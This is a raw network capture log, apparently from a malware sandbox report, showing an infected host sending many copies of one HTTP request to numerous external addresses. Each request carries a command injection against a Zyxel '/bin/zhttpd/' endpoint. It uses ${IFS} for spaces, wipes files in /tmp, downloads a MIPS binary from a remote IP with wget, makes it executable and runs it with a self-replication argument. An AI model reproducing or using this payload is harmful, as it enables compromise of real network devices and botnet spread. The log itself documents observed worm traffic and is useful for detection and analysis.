                                            Jan 14, 2024 15:50:28.232036114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1308192.168.2.235038688.4.183.0443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.232064009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1309192.168.2.234019417.64.254.92443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.232094049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1310192.168.2.2357226105.49.92.235443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.232125044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1311192.168.2.2339200187.231.245.255443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.232132912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1312192.168.2.233873637.95.42.96443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.232173920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1313192.168.2.2355234181.180.200.113443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.232188940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1314192.168.2.2350820186.145.1.47443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.232208967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1315192.168.2.235289079.204.193.2443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.232234955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1316192.168.2.234245267.92.75.65443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.232254028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1317192.168.2.2341408197.134.144.172443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.232289076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1318192.168.2.233401813.95.221.201443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.232336998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1319192.168.2.2350000122.39.87.31443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.232359886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1320192.168.2.2334134107.187.135.126443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.232367039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1321192.168.2.2342764223.40.157.45443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.232405901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1322192.168.2.234940837.65.193.191443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.232434034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1323192.168.2.2346812114.75.213.13443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.235635996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1324192.168.2.2350462201.177.94.62443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.235650063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1325192.168.2.233683825.150.45.16443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.235676050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1326192.168.2.2347040124.91.148.27443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.235683918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1327192.168.2.2337136124.245.199.20443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.235734940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1328192.168.2.2343384211.113.168.102443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.235775948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1329192.168.2.235130668.47.207.50443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.235800028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1330192.168.2.2339144134.198.207.246443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.235836983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1331192.168.2.234566825.103.145.137443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.235867977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1332192.168.2.2341782123.28.202.46443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.235902071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1333192.168.2.2359384105.74.204.42443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.235935926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1334192.168.2.2337350125.163.210.206443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.235970020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1335192.168.2.2342176130.191.98.193443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.236001015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1336192.168.2.2333526200.215.179.119443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.236031055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1337192.168.2.2344346210.5.102.51443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.236057043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1338192.168.2.2359256199.86.119.226443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.236063004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1339192.168.2.2343228171.79.23.155443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.236103058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1340192.168.2.235701666.121.7.80443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.242656946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1341192.168.2.233416868.91.22.189443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.242670059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1342192.168.2.2351432185.231.83.250443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.242714882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1343192.168.2.2333628172.234.159.143443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.242734909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1344192.168.2.235155479.235.115.50443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.242764950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1345192.168.2.235436224.247.40.187443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.242795944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1346192.168.2.2347670184.109.120.188443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.242825031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1347192.168.2.235322478.135.203.143443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.242852926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1348192.168.2.2347938124.254.252.142443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.242865086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1349192.168.2.2342606203.62.93.12443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.242882013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1350192.168.2.2345964167.27.80.179443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.242917061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1351192.168.2.2342114141.250.101.62443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.242937088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1352192.168.2.2335732154.42.103.30443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.242964983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1353192.168.2.2357844117.158.209.134443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.242990017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1354192.168.2.233292048.90.101.9443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.243046999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1355192.168.2.2359566108.34.39.18443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.243046999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1356192.168.2.235137286.233.193.123443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.243082047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1357192.168.2.234717225.101.4.92443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.243102074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1358192.168.2.234119247.30.4.66443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.243144035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1359192.168.2.2359664150.89.111.90443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.243175983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1360192.168.2.2343310143.143.157.27443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.243197918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1361192.168.2.2360602141.97.88.101443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.243213892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1362192.168.2.23571304.167.93.11443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.243263006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1363192.168.2.2359202105.70.189.133443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.243284941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1364192.168.2.2348180109.163.95.170443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.243318081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1365192.168.2.2349520122.74.120.181443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.243335009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1366192.168.2.233929438.49.247.210443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.243370056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1367192.168.2.23384764.158.79.177443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.243397951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1368192.168.2.2360472179.176.130.221443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.243417978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1369192.168.2.2351090112.249.141.132443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.243455887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1370192.168.2.2351974130.95.10.5443
                                            TimestampBytes transferredDirectionData
